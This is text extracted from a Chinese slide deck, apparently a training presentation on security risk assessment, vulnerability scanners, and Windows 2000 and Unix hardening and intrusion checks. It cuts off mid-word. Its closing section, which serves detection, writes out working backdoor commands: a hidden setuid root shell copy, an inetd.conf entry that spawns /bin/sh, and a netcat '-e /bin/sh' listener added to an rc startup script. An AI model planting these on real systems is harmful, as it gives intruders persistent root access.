安全评估工具及方法介绍.ppt

1、,安全评估工具及方法介绍,议程,评估概述评估工具介绍Windows 2000安全评估Unix安全评估网络设备安全性评估网络架构安全评估,安全风险评估三要素,资产,“资产”定义电信网和互联网及相关系统资产是具有价值的资源，是安全防护体系保护的对象。它能够以多种形式存在，有无形的、有形的，有硬件、软件，有文档、代码，也有服务、形象等。,资产识别资产是具有价值的资源，是安全策略保护的对象。风险评估中，首先需要将电信网和互联网及相关系统资产进行恰当的分类，以此为基础进行下一步的风险评估。,资产分类及示例,威胁,威胁是一种对资产构成潜在破坏的可能性因素，是客观存在的。威胁可以通过威胁主体、动机、途径等多

2、种属性来描述。威胁可能导致对电信网和互联网及相关系统产生危害的不希望事件潜在起因，它可能是人为的，也可能是非人为的；可能是无意失误，也可能是恶意攻击。常见的网络威胁有盗取帐号密码、冒名顶替、病毒、特洛伊木马、错误路由、火灾、水灾等。,威胁赋值,威胁分类及示例,脆弱性,“脆弱性”定义脆弱性是电信网和互联网及相关系统资产中存在的弱点、缺陷与不足，不直接对资产造成危害，但可能被威胁所利用从而危及资产的安全。,脆弱性赋值,威胁利用脆弱性示例,风险值计算相乘法,风险值计算方法-相乘法,风险值 资产价值 威胁值 脆弱性值风险值的取值范围为1-125，风险值等级化处理，确定风险值对应的风险等级。,安全评估,

3、网络安全,主机安全,应用安全,数据安全,物理安全,各层的安全需求：1、保证本层自身的安全；2、实现本层对上层的安全支撑；3、增强对上层安全侵害的抵抗能力；4、尽可能减少本层对下层的安全依赖；5、尽可能减少本层对下层的安全侵害；,单系统评估风险评估实施流程图,风险评估规范的依据,风险评估方法,工具评估人工检查资料分析访谈问卷调查渗透测试,工具评估,目的：以网络扫描的方式，发现易于被攻击者利用的安全风险；要求：尽可能和被扫描设备之间无访问控制扫描影响：对网络资源的影响在5%以下，对系统资源的影响在3%以下；,人工评估,目的：对工具评估结果进行分析；查找工具评估无法发现的安全漏洞；了解系统配置信息，

4、为安全加固做准备；查看系统受攻击情况；要求：以系统管理员方式登陆系统评估影响：不对系统进行任何更改，没有影响；,风险规避措施,评估前要求对重要系统进行有效备份；扫描中不使用DoS扫描策略；对重要业务系统选择业务量比较小的时间段进行评估；双机热备系统分别扫描，确认工作正常后再继续扫描；发现问题，及时中止，确认问题解决后再继续扫描,议程,评估概述评估工具介绍Windows 2000安全评估Unix安全评估网络设备安全性评估网络架构安全评估,什么是扫描器,什么是扫描器黑客实施盗窃之前，最先进行的工作窥探，利用扫描器可以收集到：操作系统类型、开放端口、开放服务及版本号、共享目录，无疑扫描器成了黑客的帮

5、凶！但扫描器无罪，关键看掌握在谁的手里；,什么是扫描器,安全管理者眼中的扫描器知己知彼，百战不殆。通过扫描器可以对己方的安全隐患了如指掌；利用扫描器提供的漏洞修补建议，完成系统的加固；防范未授权的扫描：部署防火墙、IDS等；与其它产品联动：防火墙阻断主机、IDS入侵事件过滤;,主流扫描器,ISSSSSWebRavorLinktrust Network ScannerXSCANSPUER-SCANNMAPNESSUS流光,X-Scan,X-Scan,NESSUS,NESSUS,议程,评估概述评估工具介绍Windows 2000安全评估Unix安全评估网络设备安全性评估网络架构安全评估,主要检查项

6、,补丁与版本用户与口令服务状况安全配置系统日志主要应用软件被攻击情况检查,版本与补丁,版本查看办法“我的电脑”属性”开始菜单“管理工具”计算机管理系统信息系统摘要补丁查看办法通过在线Windows Update，检查有哪些安全更新需要安装通过“控制面板”添加/删除软件”查看已经安装了哪些补丁通过注册表HKEY_LOCAL_MACHINESOFTWAREMicrosoftUpdates通过其它工具,用户与口令,确保禁用Guest等账户；检查用户所属的组，关注administrators组；,用户与口令,C:winntrepairsam文件,服务状况,“管理工具”服务需要关注的服务Alerter、

7、messenger、snmp、remote registry service、routing and remote access、run as、telnet、ftp、smtp、nntp、terminal service、www其他远程服务、可疑的服务远程管理服务Terminal service、pcanywhere、netmeeting等共享服务C:net share“管理工具”计算机管理”共享”注意共享访问权限,安全配置,安全选项“管理工具”“本地安全策略”“安全设置/本地策略/安全选项”对匿名连接的额外限制；允许在未登录前关机；是否显示上次登录帐号；LAN Manager身份验证级别；发送

8、未加密的密码以连接到第三方SMB服务器；允许弹出可移动NTFS媒体；在断开会话之前所需的空闲时间；如果无法记录安全审计则立即关闭系统；登录屏幕上不要显示上次登录的用户名；禁用按CTRL+ALT+DEL进行登录的设置；在关机时清理虚拟内存页面交换文件；,系统日志,系统日志设置,系统日志,日志审核设置,主要应用软件,MS SQL Server等数据库软件Seru-U等ftp软件Apache、IIS等WWW服务软件,被攻击情况检查,查看系统进程任务管理器查看系统开放服务查看系统端口和连接Netstat an结合fport工具查看系统日志系统日志、安全日志、应用日志、IIS等访问日志C:winntsy

9、stem32logfiles,被攻击情况检查,系统注册表HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun和HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunOnce项下是否有异常程序 菜单程序启动Txt、exe等关联程序C:ftype txtfile等,议程,评估概述评估工具介绍Windows 2000安全评估Unix安全评估网络设备安全性评估网络架构安全评估,主要检查项,系统基本信息root用户安全配置系统服务启动状况关键服务配置用户与口令系统审计文件系统与文件权限其他,系统基本信息（补丁）,系统补丁信息使用o

10、slevel确定系统版本补丁分为三类Recommended Maintenance Package(RM)Critical Fix(cfix)Emergence Fix(efix)推荐使用RPM安装系统补丁对于最新的漏洞，需要efix,系统基本信息（其他）,系统基本信息uname-a系统网卡信息ifconfig-a系统路由信息netstat-nr网络连接信息netstat-na系统进程信息ps-ef,root用户安全配置,是否允许root用户远程登录在/etc/security/user文件中设定使用lsuser可以查看使用chuser更改root用户的环境变量/etc/environment

11、是全局的环境变量/etc/security/environ中可以设定单个用户的环境变量也可以通过启动文件设定环境变量,系统服务启动状况,初始的启动文件/etc/inittabpiobeqdaemonwritesrvhttpdlite通常服务在/etc/rc.*文件中启动rc.nfsrc.tcpiprc.d/inetd的启动文件/etc/inetd.conf,关键服务配置,R命令（rlogin,rsh）的配置情况CDE（dtlogin）是否设置访问控制Ftp服务是否限制系统用户访问（/etc/ftpusers）Cron服务NFS服务SNMP服务Sendmail服务DNS服务,用户与口令,删除无用

12、用户查看是否存在空/弱口令口令策略设定在/etc/security/user文件中设定使用lsuser/chuser查看与修改登录策略设定在/etc/security/login.cfg文件中设定通用用户的环境变量设定在/etc/environment文件中设定,系统审计,syslog日志的配置状况记录失败登录：/etc/security/failedlogin使用who查看：who/etc/security/failedlogin记录最新登录：/etc/security/lastlog文本文件，使用more查看记录su的使用：/var/adm/sulog文本文件，使用more查看,文件系统与

13、文件权限,以安全模式加载文件系统文件基本权限查找setuid,setgid与全局可写的文件find/-perm-4000-ls 查找所有setuid的文件find/-perm-2000-ls 查找所有setgid的文件find/-perm-0004-ls 查找所有全局可写的文件和目录,其他,修改banner信息在/etc/security/login.cfg中修改herald参数对网络连接设置访问控制,服务安全管理,尽可能少泄露系统信息更改telnetdftpdbindsendmail等的banner信息 编写安全的用户程序注意避免自己编写的用户程序中常见的安全漏洞，它们往往成为黑客攻击的突破

14、口。,主要应用软件安全性,服务的安全补丁除了操作系统的安全补丁外，各厂商的应用服务，也需要安装相应的安全补丁。比如sendmail、Bind、Apache、WUFTP、数据库、网管系统等等，都会不定期出现严重的安全漏洞，需要单独安装其安全补丁。,主要应用软件安全性,对服务的安全配置对主要的服务，比如snmpd、sendmail、bind、apache、NFS等，如果必须开放的话，也应该进行相应的安全配置。,入侵检查,基本理念了解后门的形式会有助于对攻击者入侵行为和后门的检查系统是否可信系统已经或者有可能受到攻击，那么许多信息已经不再完全可信通过lsnetstatpsfind等获得的信息不再可信

15、，因为这些应用程序本身可能已经被入侵者篡改；syslog日志可能已经被删除或者篡改；文件或者目录的大小属性、时间戳等都可能被伪造。入侵痕迹入侵者往往会由于技术或者非技术的原因留下蛛丝马迹当攻击者多次登录、或者多台机器被入侵时，由于疏忽的原因，留下痕迹的可能性会更大,入侵检查,使用基本的系统命令ls命令：注意查看文件的ACLTime时间戳、权限位、大小、属主等；find命令：可以根据文件的ACLtime时间戳、权限、大小、属主、类型等特性进行查找；ps eaf或者/bin/ucb/ps aux查看进程信息；ldd查看命令所调用的动态库netstat an命令查看端口链接信息；lsof查看进程打开

16、的端口、打开的文件等属性；strings和file命令查看文件信息；,入侵检查,使用基本的系统日志查看系统本身的相关日志，但它们被篡改的可能性较大；查看网络日志服务器的日志或者查看IDS系统日志等它们一般比较可靠，被篡改的可能性相对较小。使用其它工具（chkrootkit）,常见的后门形式,suid后门把重要的文件cp到隐藏的目录下，设置suid位，比如：cp/bin/ksh/tmp/.aachown root:root.aachmod 4755.aa,常见的后门形式,inetd后门选择一个不常被使用的服务，用可以产生某种后门的守护进程代替原先的守护进程,比如：将用于提供日期时间的服务 daytime 替换为能够产生一个 suid root 的 shell vi/etc/inetd.conf daytime stream tcp nowait/bin/sh sh-i.,常见的后门形式,rc等启动脚本后门在rc启动脚本中运行后门服务，比如在/sbin/rc3或者/etc/rc2.d/S69inet中增加：nc l p 9999 e/bin/sh&将会在tcp 9999端口监听。,常见的后